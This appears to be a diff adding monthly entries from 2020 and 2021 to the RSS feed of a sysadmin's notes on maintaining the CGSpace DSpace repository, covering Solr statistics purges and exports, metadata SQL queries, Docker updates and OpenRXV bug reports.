+&lt;li&gt;Atmire merged some changes I had submitted to the COUNTER-Robots project&lt;/li&gt;
+&lt;li&gt;I updated our local spider user agents and then re-ran the list with my &lt;code&gt;check-spider-hits.sh&lt;/code&gt; script on CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1989 hits from The Knowledge AI in statistics
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1235 hits from MaCoCu in statistics
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 455 hits from WhatsApp in statistics
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
+&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-11/</link>
+      <pubDate>Tue, 02 Nov 2021 22:27:07 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-11/</guid>
+      <description>&lt;h2 id=&#34;2021-11-02&#34;&gt;2021-11-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I experimented with manually sharding the Solr statistics on DSpace Test&lt;/li&gt;
+&lt;li&gt;First I exported all the 2019 stats from CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ zstd statistics-2019.json
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-10/</link>
+      <pubDate>Fri, 01 Oct 2021 11:14:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-10/</guid>
+      <description>&lt;h2 id=&#34;2021-10-01&#34;&gt;2021-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export all affiliations on CGSpace and run them against the latest RoR data dump:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;ations-matching.csv
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;1879
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ wc -l /tmp/2021-10-01-affiliations.txt 
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;7100 /tmp/2021-10-01-affiliations.txt
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
+&lt;li&gt;So we have 1879/7100 (26.46%) matching already&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-09/</link>
+      <pubDate>Wed, 01 Sep 2021 09:14:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-09/</guid>
+      <description>&lt;h2 id=&#34;2021-09-02&#34;&gt;2021-09-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Troubleshooting the missing Altmetric scores on AReS
+&lt;ul&gt;
+&lt;li&gt;Turns out that I didn&amp;rsquo;t actually fix them last month because the check for &lt;code&gt;content.altmetric&lt;/code&gt; still exists, and I can&amp;rsquo;t access the DOIs using &lt;code&gt;_h.source.DOI&lt;/code&gt; for some reason&lt;/li&gt;
+&lt;li&gt;I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!&lt;/li&gt;
+&lt;li&gt;I will change &lt;code&gt;DOI&lt;/code&gt; to &lt;code&gt;tomato&lt;/code&gt; in the repository setup and start a re-harvest&amp;hellip; I need to see if this is some kind of reserved word or something&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Even as &lt;code&gt;tomato&lt;/code&gt; I can&amp;rsquo;t access that field as &lt;code&gt;_h.source.tomato&lt;/code&gt; in Angular, but it does work as a filter source&amp;hellip; sigh&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;m having problems using the OpenRXV API
+&lt;ul&gt;
+&lt;li&gt;The syntax Moayad showed me last month doesn&amp;rsquo;t seem to honor the search query properly&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-08/</link>
+      <pubDate>Sun, 01 Aug 2021 09:01:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-08/</guid>
+      <description>&lt;h2 id=&#34;2021-08-01&#34;&gt;2021-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Update Docker images on AReS server (linode20) and reboot the server:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
+&lt;li&gt;I decided to upgrade linode20 from Ubuntu 18.04 to 20.04&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-07/</link>
+      <pubDate>Thu, 01 Jul 2021 08:53:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-07/</guid>
+      <description>&lt;h2 id=&#34;2021-07-01&#34;&gt;2021-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;COPY 20994
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-06/</link>
+      <pubDate>Tue, 01 Jun 2021 10:51:07 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-06/</guid>
+      <description>&lt;h2 id=&#34;2021-06-01&#34;&gt;2021-06-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;IWMI notified me that AReS was down with an HTTP 502 error
+&lt;ul&gt;
+&lt;li&gt;Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification&lt;/li&gt;
+&lt;li&gt;I don&amp;rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the &lt;code&gt;angular_nginx&lt;/code&gt; container isn&amp;rsquo;t running&lt;/li&gt;
+&lt;li&gt;I simply started it and AReS was running again:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-05/</link>
+      <pubDate>Sun, 02 May 2021 09:50:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-05/</guid>
+      <description>&lt;h2 id=&#34;2021-05-01&#34;&gt;2021-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents:
+&lt;ul&gt;
+&lt;li&gt;&amp;ldquo;RI/1.0&amp;rdquo;, 1337&lt;/li&gt;
+&lt;li&gt;&amp;ldquo;Microsoft Office Word 2014&amp;rdquo;, 941&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&amp;hellip; as that&amp;rsquo;s an actual user&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-04/</link>
+      <pubDate>Thu, 01 Apr 2021 09:50:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-04/</guid>
+      <description>&lt;h2 id=&#34;2021-04-01&#34;&gt;2021-04-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I wrote a script to query Sherpa&amp;rsquo;s API for our ISSNs: &lt;code&gt;sherpa-issn-lookup.py&lt;/code&gt;
+&lt;ul&gt;
+&lt;li&gt;I&amp;rsquo;m curious to see how the results compare with the results from Crossref yesterday&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;AReS Explorer was down since this morning, I didn&amp;rsquo;t see anything in the systemd journal
+&lt;ul&gt;
+&lt;li&gt;I simply took everything down with docker-compose and then back up, and then it was OK&lt;/li&gt;
+&lt;li&gt;Perhaps one of the containers crashed, I should have looked closer but I was in a hurry&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-03/</link>
+      <pubDate>Mon, 01 Mar 2021 10:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-03/</guid>
+      <description>&lt;h2 id=&#34;2021-03-01&#34;&gt;2021-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Discuss some OpenRXV issues with Abdullah from CodeObia
+&lt;ul&gt;
+&lt;li&gt;He&amp;rsquo;s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API&lt;/li&gt;
+&lt;li&gt;Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGSpace CG Core v2 Migration</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/</link>
+      <pubDate>Sun, 21 Feb 2021 13:27:35 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/</guid>
+      <description>&lt;p&gt;Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.&lt;/p&gt;
+&lt;p&gt;With reference to &lt;a href=&#34;https://agriculturalsemantics.github.io/cg-core/cgcore.html&#34;&gt;CG Core v2 draft standard&lt;/a&gt; by Marie-Angélique as well as &lt;a href=&#34;http://www.dublincore.org/specifications/dublin-core/dcmi-terms/&#34;&gt;DCMI DCTERMS&lt;/a&gt;.&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-02/</link>
+      <pubDate>Mon, 01 Feb 2021 10:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-02/</guid>
+      <description>&lt;h2 id=&#34;2021-02-01&#34;&gt;2021-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Abenet said that CIP found more duplicate records in their export from AReS
+&lt;ul&gt;
+&lt;li&gt;I re-opened &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/67&#34;&gt;the issue&lt;/a&gt; on OpenRXV where we had previously noticed this&lt;/li&gt;
+&lt;li&gt;The shared link where the duplicates are is here: &lt;a href=&#34;https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6&#34;&gt;https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I had a call with CodeObia to discuss the work on OpenRXV&lt;/li&gt;
+&lt;li&gt;Check the results of the AReS harvesting from last night:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;{
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  &amp;#34;count&amp;#34; : 100875,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  &amp;#34;_shards&amp;#34; : {
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;total&amp;#34; : 1,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;successful&amp;#34; : 1,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;skipped&amp;#34; : 0,
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;#34;failed&amp;#34; : 0
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  }
+&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}
+&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2021</title>
+      <link>https://alanorth.github.io/cgspace-notes/2021-01/</link>
+      <pubDate>Sun, 03 Jan 2021 10:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2021-01/</guid>
+      <description>&lt;h2 id=&#34;2021-01-03&#34;&gt;2021-01-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter notified me that some filters on AReS were broken again
+&lt;ul&gt;
+&lt;li&gt;It&amp;rsquo;s the same issue with the field names getting &lt;code&gt;.keyword&lt;/code&gt; appended to the end that I already &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/66&#34;&gt;filed an issue on OpenRXV about last month&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;I fixed the broken filters (careful to not edit any others, lest they break too!)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV
+&lt;ul&gt;
+&lt;li&gt;The start page had been &amp;ldquo;1&amp;rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API&lt;/li&gt;
+&lt;li&gt;I adjusted it to default to 0 and added a note to the admin screen&lt;/li&gt;
+&lt;li&gt;I realized that this issue was actually causing the first page of 100 statistics to be missing&amp;hellip;&lt;/li&gt;
+&lt;li&gt;For example, &lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/66839&#34;&gt;this item&lt;/a&gt; has 51 views on CGSpace, but 0 on AReS&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-12/</link>
+      <pubDate>Tue, 01 Dec 2020 11:32:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-12/</guid>
+      <description>&lt;h2 id=&#34;2020-12-01&#34;&gt;2020-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Atmire responded about the issue with duplicate data in our Solr statistics
+&lt;ul&gt;
+&lt;li&gt;They noticed that some records in the statistics-2015 core haven&amp;rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&amp;rsquo;t migrated any of the records yet&lt;/li&gt;
+&lt;li&gt;That&amp;rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the &lt;code&gt;cua_version&lt;/code&gt; field&lt;/li&gt;
+&lt;li&gt;I started processing those (about 411,000 records):&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGSpace DSpace 6 Upgrade</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/</link>
+      <pubDate>Sun, 15 Nov 2020 13:27:35 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/</guid>
+      <description>&lt;p&gt;Notes about the DSpace 6 upgrade on CGSpace in 2020-11.&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-11/</link>
+      <pubDate>Sun, 01 Nov 2020 13:11:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-11/</guid>
+      <description>&lt;h2 id=&#34;2020-11-01&#34;&gt;2020-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test
+&lt;ul&gt;
+&lt;li&gt;So far we&amp;rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&amp;hellip; wow.&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-10/</link>
+      <pubDate>Tue, 06 Oct 2020 16:55:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-10/</guid>
+      <description>&lt;h2 id=&#34;2020-10-06&#34;&gt;2020-10-06&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add tests for the new &lt;code&gt;/items&lt;/code&gt; POST handlers to the DSpace 6.x branch of my &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api/tree/v6_x&#34;&gt;dspace-statistics-api&lt;/a&gt;
+&lt;ul&gt;
+&lt;li&gt;It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available&lt;/li&gt;
+&lt;li&gt;Tag and release version 1.3.0 on GitHub: &lt;a href=&#34;https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0&#34;&gt;https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump
+&lt;ul&gt;
+&lt;li&gt;During the FlywayDB migration I got an error:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-09/</link>
+      <pubDate>Wed, 02 Sep 2020 15:35:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-09/</guid>
+      <description>&lt;h2 id=&#34;2020-09-02&#34;&gt;2020-09-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS&lt;/li&gt;
+&lt;li&gt;The AReS Explorer hasn&amp;rsquo;t updated its index since 2020-08-22 when I last forced it
+&lt;ul&gt;
+&lt;li&gt;I restarted it again now and told Moayad that the automatic indexing isn&amp;rsquo;t working&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Add &lt;code&gt;Alliance of Bioversity International and CIAT&lt;/code&gt; to affiliations on CGSpace&lt;/li&gt;
+&lt;li&gt;Abenet told me that the general search text on AReS doesn&amp;rsquo;t get reset when you use the &amp;ldquo;Reset Filters&amp;rdquo; button
+&lt;ul&gt;
+&lt;li&gt;I filed a bug on OpenRXV: &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/39&#34;&gt;https://github.com/ilri/OpenRXV/issues/39&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I filed an issue on OpenRXV to make some minor edits to the admin UI: &lt;a href=&#34;https://github.com/ilri/OpenRXV/issues/40&#34;&gt;https://github.com/ilri/OpenRXV/issues/40&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-08/</link>
+      <pubDate>Sun, 02 Aug 2020 15:35:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-08/</guid>
+      <description>&lt;h2 id=&#34;2020-08-02&#34;&gt;2020-08-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their &lt;code&gt;cg.coverage.country&lt;/code&gt; text values
+&lt;ul&gt;
+&lt;li&gt;It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&amp;rsquo;s preferred &amp;ldquo;display&amp;rdquo; country names)&lt;/li&gt;
+&lt;li&gt;It implements a &amp;ldquo;force&amp;rdquo; mode too that will clear existing country codes and re-tag everything&lt;/li&gt;
+&lt;li&gt;It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-07/</link>
+      <pubDate>Wed, 01 Jul 2020 10:53:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-07/</guid>
+      <description>&lt;h2 id=&#34;2020-07-01&#34;&gt;2020-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;A few users noticed that CGSpace wasn&amp;rsquo;t loading items today, item pages seem blank
+&lt;ul&gt;
+&lt;li&gt;I looked at the PostgreSQL locks but they don&amp;rsquo;t seem unusual&lt;/li&gt;
+&lt;li&gt;I guess this is the same &amp;ldquo;blank item page&amp;rdquo; issue that we had a few times in 2019 that we never solved&lt;/li&gt;
+&lt;li&gt;I restarted Tomcat and PostgreSQL and the issue was gone&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the &lt;code&gt;5_x-prod&lt;/code&gt; branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&amp;rsquo;s request&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-06/</link>
+      <pubDate>Mon, 01 Jun 2020 13:55:39 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-06/</guid>
+      <description>&lt;h2 id=&#34;2020-06-01&#34;&gt;2020-06-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I tried to run the &lt;code&gt;AtomicStatisticsUpdateCLI&lt;/code&gt; CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday
+&lt;ul&gt;
+&lt;li&gt;I sent Atmire the dspace.log from today and told them to log into the server to debug the process&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;In other news, I checked the statistics API on DSpace 6 and it&amp;rsquo;s working&lt;/li&gt;
+&lt;li&gt;I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-05/</link>
+      <pubDate>Sat, 02 May 2020 09:52:04 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-05/</guid>
+      <description>&lt;h2 id=&#34;2020-05-02&#34;&gt;2020-05-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter said that CTA is having problems submitting an item to CGSpace
+&lt;ul&gt;
+&lt;li&gt;Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &amp;lsquo;idle in transaction&amp;rsquo; and &amp;lsquo;waiting for lock&amp;rsquo; state are increasing again&lt;/li&gt;
+&lt;li&gt;I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2020</title>
+      <link>https://alanorth.github.io/cgspace-notes/2020-04/</link>
+      <pubDate>Thu, 02 Apr 2020 10:53:24 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2020-04/</guid>
+      <description>&lt;h2 id=&#34;2020-04-02&#34;&gt;2020-04-02&lt;/h2&gt;
+&lt;ul&gt;
